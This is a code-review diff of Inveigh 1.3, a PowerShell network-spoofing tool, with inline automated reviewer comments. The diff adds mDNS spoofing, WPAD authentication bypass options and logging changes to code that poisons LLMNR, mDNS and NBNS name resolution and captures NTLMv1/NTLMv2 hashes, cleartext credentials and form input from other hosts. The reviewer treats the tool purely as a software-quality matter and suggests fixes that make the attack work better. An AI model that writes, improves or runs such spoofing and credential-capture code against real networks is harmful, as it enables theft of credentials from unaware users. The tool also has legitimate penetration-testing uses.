+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$mDNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("QU","QM")][Array]$mDNSTypes = @("QU"),
+ [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
+ [parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
[parameter(Mandatory=$false)][Switch]$Inspect,
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
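Review bot: two entries break the alphabetical order this resort otherwise establishes: $StartupChecks is placed after $WPADDirectFile in the ValidateSet("Y","N") group, and [Switch]$Inspect sits between $HTTPDir and the ValidateScript IP-address entries instead of with the other single-attribute parameters. Minor, but the block is being reordered wholesale here, so it is the cheapest moment to make it consistent.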
@@ -366,6 +395,8 @@ if ($invalid_parameter)
throw
}
+$inveigh_version = "1.3"
+
if(!$IP)
{
$IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
@@ -410,26 +441,26 @@ if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
throw
}
-if(!$OutputDir)
+if(!$FileOutputdirectory)
{
$output_directory = $PWD.Path
}
else
{
- $output_directory = $OutputDir
+ $output_directory = $FileOutputdirectory
}
if(!$inveigh)
{
$global:inveigh = [HashTable]::Synchronized(@{})
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
$inveigh.log = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
- $inveigh.cleartext_list = New-Object System.Collections.ArrayList
$inveigh.POST_request_list = New-Object System.Collections.ArrayList
- $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
$inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
}
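Review bot: $FileOutputdirectory (lower-case "d") on both new lines does not match the declared parameter $FileOutputDirectory; PowerShell variable names are case-insensitive so it runs, but the mismatch defeats a search for the parameter name and reads as a typo. Since the .PARAMETER OutputDir help entry is deleted in an earlier hunk of this file, also confirm that a .PARAMETER FileOutputDirectory entry was added in its place.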
@@ -450,23 +481,24 @@ if($HTTP_listener.IsListening -and !$inveigh.relay_running)
if(!$inveigh.relay_running)
{
+ $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.console_queue = New-Object System.Collections.ArrayList
- $inveigh.status_queue = New-Object System.Collections.ArrayList
+ $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
- $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
- $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.console_output = $false
+ $inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.console_input = $true
+ $inveigh.console_output = $false
$inveigh.file_output = $false
$inveigh.HTTPS_existing_certificate = $false
$inveigh.HTTPS_force_certificate_delete = $false
+ $inveigh.log_output = $true
+ $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
- $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
$inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
}
@@ -508,17 +540,16 @@ if($StartupChecks -eq 'Y')
$HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
}
+ if($LLMNR -eq 'Y' -and !$elevated_privilege)
+ {
+ $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 "
+ }
+
}
if(!$elevated_privilege)
{
- if($Inspect)
- {
- Write-Output "Error:-Inspect requires elevated privileges"
- throw
- }
-
if($HTTPS -eq 'Y')
{
Write-Output "Error:-HTTPS requires elevated privileges"
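Review bot: the new LLMNR port check only matches a socket bound to 0.0.0.0:5355; a listener bound to a specific interface address would be missed, which is exactly the situation the check is meant to catch. Matching on ":5355 " without the address prefix covers both cases. Separately, the context line $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " appears to store the proxy-port result in the HTTPS variable; if that is the proxy check it should have its own variable, otherwise the HTTPS port result is overwritten.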
@@ -558,12 +589,22 @@ else
if($Inspect)
{
- $LLMNR = "N"
- $NBNS = "N"
- $HTTP = "N"
- $HTTPS = "N"
- $Proxy = "N"
- $SMB = "N"
+
+ if($elevated_privilege)
+ {
+ $LLMNR = "N"
+ $NBNS = "N"
+ $HTTP = "N"
+ $HTTPS = "N"
+ $Proxy = "N"
+ }
+ else
+ {
+ $HTTP = "N"
+ $HTTPS = "N"
+ $Proxy = "N"
+ }
+
}
if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
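Review bot: the elevated Inspect branch no longer disables SMB (the old block set $SMB = "N") and neither branch disables the new mDNS spoofer ($mDNS = "N" is absent), so in Inspect mode the mDNS spoofer will still answer queries; that contradicts the Inspect help text removed earlier in this patch ("Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic"). If dropping SMB is intentional, update the help entry; either way add $mDNS = "N". In the unprivileged branch LLMNR and NBNS stay enabled, so confirm that the UDP listeners suppress their responses when $Inspect is set, otherwise "inspect" still spoofs.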
@@ -580,6 +621,7 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
$inveigh.newline = "`n"
+ $LogOutput = "N"
$ShowHelp = "N"
switch ($ConsoleOutput)
@@ -610,8 +652,22 @@ else
}
# Write startup messages
-$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null
-$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
+$inveigh.status_queue.Add("Inveigh $inveigh_version started at $(Get-Date -format 's')") > $null
+
+if($FileOutput -eq 'Y')
+{
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh $inveigh_version started") > $null
+}
+
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh started") > $null
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege)
{
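Review bot: the file log line and the in-memory log line now differ: "Inveigh $inveigh_version started" goes to log_file_queue but "Inveigh started" (no version) goes to $inveigh.log. Build the message once in a variable and add it to whichever queues are enabled, so the two copies cannot drift. The $inveigh.log_output = $true inside the if is redundant with the $inveigh.log_output = $true initialisation added in the queue-setup hunk above, but harmless.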
@@ -635,14 +691,28 @@ if($firewall_status)
}
-$inveigh.status_queue.Add("Listening IP Address = $IP") > $null
-$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null
+$inveigh.status_queue.Add("Primary IP Address = $IP") > $null
+
+if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y')
+{
+ $inveigh.status_queue.Add("LLMNR/mDNS/NBNS Spoofer IP Address = $SpooferIP") > $null
+}
if($LLMNR -eq 'Y')
{
- $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
- $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
- $LLMNR_response_message = "- response sent"
+
+ if($elevated_privilege -or !$LLMNR_port_check)
+ {
+ $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
+ $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
+ $LLMNR_response_message = "- response sent"
+ }
+ else
+ {
+ $LLMNR = "N"
+ $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
+ }
+
}
else
{
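Review bot: the new "LLMNR Spoofer Disabled Due To In Use Port 5355" branch sets $LLMNR = "N" but never assigns $LLMNR_response_message, whereas the existing else branch sets it to "- LLMNR spoofer is disabled". Any later console line that appends $LLMNR_response_message will print an empty suffix in the port-in-use case; set the message in that branch as well.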
@@ -650,9 +720,32 @@ else
$LLMNR_response_message = "- LLMNR spoofer is disabled"
}
+if($mDNS -eq 'Y')
+{
+ $mDNS_response_message = "- response sent"
+ $mDNSTypes_output = $mDNSTypes -join ","
+
+ if($mDNSTypes.Count -eq 1)
+ {
+ $inveigh.status_queue.Add("mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null
+ }
+ else
+ {
+ $inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
+ }
+
+ $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null
+}
+else
+{
+ $inveigh.status_queue.Add("mDNS Spoofer = Disabled") > $null
+ $mDNS_response_message = "- mDNS spoofer is disabled"
+}
+
if($NBNS -eq 'Y')
{
$NBNSTypes_output = $NBNSTypes -join ","
+ $NBNS_response_message = "- response sent"
if($NBNSTypes.Count -eq 1)
{
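Review bot: unlike the LLMNR block, the mDNS block has no in-use-port check for the unprivileged case, although UDP 5353 is at least as likely to be occupied (Bonjour and other mDNS responders bind it). Add an $mDNS_port_check mirroring the LLMNR one in the StartupChecks section and a matching "mDNS Spoofer Disabled Due To In Use Port 5353" branch here, and make sure $mDNS_response_message is set on that path too.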
@@ -663,7 +756,6 @@ if($NBNS -eq 'Y')
$inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
}
- $NBNS_response_message = "- response sent"
}
else
{
@@ -683,10 +775,6 @@ if($NBNSBruteForce -eq 'Y')
}
}
-else
-{
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null
-}
if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y')
{
@@ -766,7 +854,6 @@ if($HTTP -eq 'Y')
if($HTTP_port_check)
{
$HTTP = "N"
- $inveigh.HTTP = $false
$inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
}
else
@@ -782,14 +869,12 @@ if($HTTP -eq 'Y')
$inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
}
- $inveigh.HTTP = $true
$inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
}
}
else
{
- $inveigh.HTTP = $false
$inveigh.status_queue.Add("HTTP Capture = Disabled") > $null
}
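Review bot: the $inveigh.HTTP = $true/$false assignments are removed in this and the previous hunk, so $inveigh.HTTP is never set anywhere in this file; verify that no reader remains (support functions, the HTTP scriptblock, or Inveigh-Relay.ps1), since a stale reference would now silently evaluate to $null.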
@@ -899,6 +984,17 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null
$inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
+ if($WPADAuth -like "NTLM*")
+ {
+ $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($WPADAuthIgnore.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null
+ }
+
+ }
+
if($HTTPDir -and !$HTTPResponse)
{
$inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null
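Review bot: the trimming of $WPADAuthIgnore only happens inside if($WPADAuth -like "NTLM*"), so for Basic or Anonymous the raw default "" is handed to the HTTP scriptblock; this is only safe because the scriptblock's condition repeats the -like 'NTLM*' test. Normalise the list unconditionally, next to the other parameter handling, so the value passed into the runspace is always clean and the two checks are not coupled. The same Where-Object {$_ -and $_.Trim()} cleanup would also benefit $ProxyIgnore, which is matched against user agents the same way.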
@@ -1257,7 +1353,17 @@ $SMB_NTLM_functions_scriptblock =
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
+ }
+
$inveigh.NTLMv2_list.Add($NTLMv2_hash)
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
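Review bot: the same log message is built twice (once for log_file_queue, once for $inveigh.log) here and again in the NTLMv1 block and the HTTP listener's error path below; assign it to a variable once and add that to whichever queues are enabled, so the two copies cannot drift (the startup hunk already shows such a drift, with the version string in one copy but not the other). The ArrayList.Add return values also go unsuppressed on the new lines; the startup code uses > $null, so use it here too for consistency.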
@@ -1266,7 +1372,7 @@ $SMB_NTLM_functions_scriptblock =
}
else
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
@@ -1294,7 +1400,17 @@ $SMB_NTLM_functions_scriptblock =
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
+ }
+
$inveigh.NTLMv1_list.Add($NTLMv1_hash)
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
@@ -1303,7 +1419,7 @@ $SMB_NTLM_functions_scriptblock =
}
else
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
@@ -1335,7 +1451,7 @@ $SMB_NTLM_functions_scriptblock =
# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener
$HTTP_scriptblock =
{
- param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
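Review bot: $WPADAuthIgnore is inserted as a positional parameter before $WPADResponse, so the runspace invocation that feeds $HTTP_scriptblock (the AddArgument chain, not in this hunk) must insert the argument at the same position; if it was appended at the end instead, $WPADResponse would receive the ignore list and the wpad.dat contents would land in $WPADAuthIgnore. Worth a quick check at each call site (HTTP, HTTPS and proxy).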
@@ -1418,6 +1534,7 @@ $HTTP_scriptblock =
$HTTP_running = $true
$HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+ $HTTP_client_close = $true
if($proxy_listener)
{
@@ -1432,22 +1549,35 @@ $HTTP_scriptblock =
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")])
$HTTP_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
+ }
+
}
- $HTTP_client_close = $true
-
:HTTP_listener_loop while($inveigh.running -and $HTTP_running)
{
$TCP_request = ""
$TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_send = $true
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
$HTTP_header_cache_control = ""
$HTTP_header_authenticate = ""
$HTTP_header_authenticate_data = ""
$HTTP_message = ""
$HTTP_header_authorization = ""
+ $HTTP_header_host = ""
+ $HTTP_header_user_agent = ""
+ $HTTP_request_raw_URL = ""
+ $NTLM = "NTLM"
while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
{
@@ -1505,12 +1635,67 @@ $HTTP_scriptblock =
$HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
$HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
if($NBNSBruteForcePause)
{
$inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
$inveigh.hostname_spoof = $true
}
+
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ }
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ }
+
+ if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
+ }
+
+ if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ }
+
+ }
+
+ }
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
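Review bot: the offset corrections are right (the search strings "-48-6F-73-74-3A-20-" and "-55-73-65-72-2D-41-67-65-6E-74-3A-20-" are 19 and 37 characters, so the old +18/+36 left a leading "-" that produced an empty element on Split and a ToInt16 failure). Two points on the rest of the block: $ProxyIgnore entries are now matched with -match, i.e. as regular expressions, where the old code used .contains; a user-supplied entry containing regex metacharacters changes meaning, so either use [regex]::Escape($_) or -like "*$_*". And the "ignoring wpad.dat request due to user agent" line is logged for every new request from a matching user agent regardless of URL, since the test does not look at $HTTP_request_raw_URL; condition it on the wpad.dat path (and on $proxy_listener if that is the intent) so the log does not claim a wpad.dat request was ignored when none was made.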
@@ -1520,10 +1705,12 @@ $HTTP_scriptblock =
$HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
}
- if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous'))
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
+ $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
}
else
{
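Review bot: the new WPADAuthIgnore clause evaluates each entry with -match, so entries are regular expressions rather than the keywords the help text promises; use [regex]::Escape($_) (or -like "*$_*") here and in the logging block above so an entry containing "(" or "+" cannot throw or broaden the match. Also, $HTTP_client_close is set to $true on this 200 path and to $false in the 401 path below; a one-line comment on why anonymous responses close the connection while challenge responses keep it open would save the next reader some digging.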
@@ -1549,44 +1736,7 @@ $HTTP_scriptblock =
}
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
- }
-
- $NTLM = "NTLM"
- $NTLM_auth = $false
- $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
-
- if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
-
- if($TCP_request -like "*-48-6F-73-74-3A-20-*")
- {
- $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 18)
- $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
- $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")])
- }
-
- if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
- {
- $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
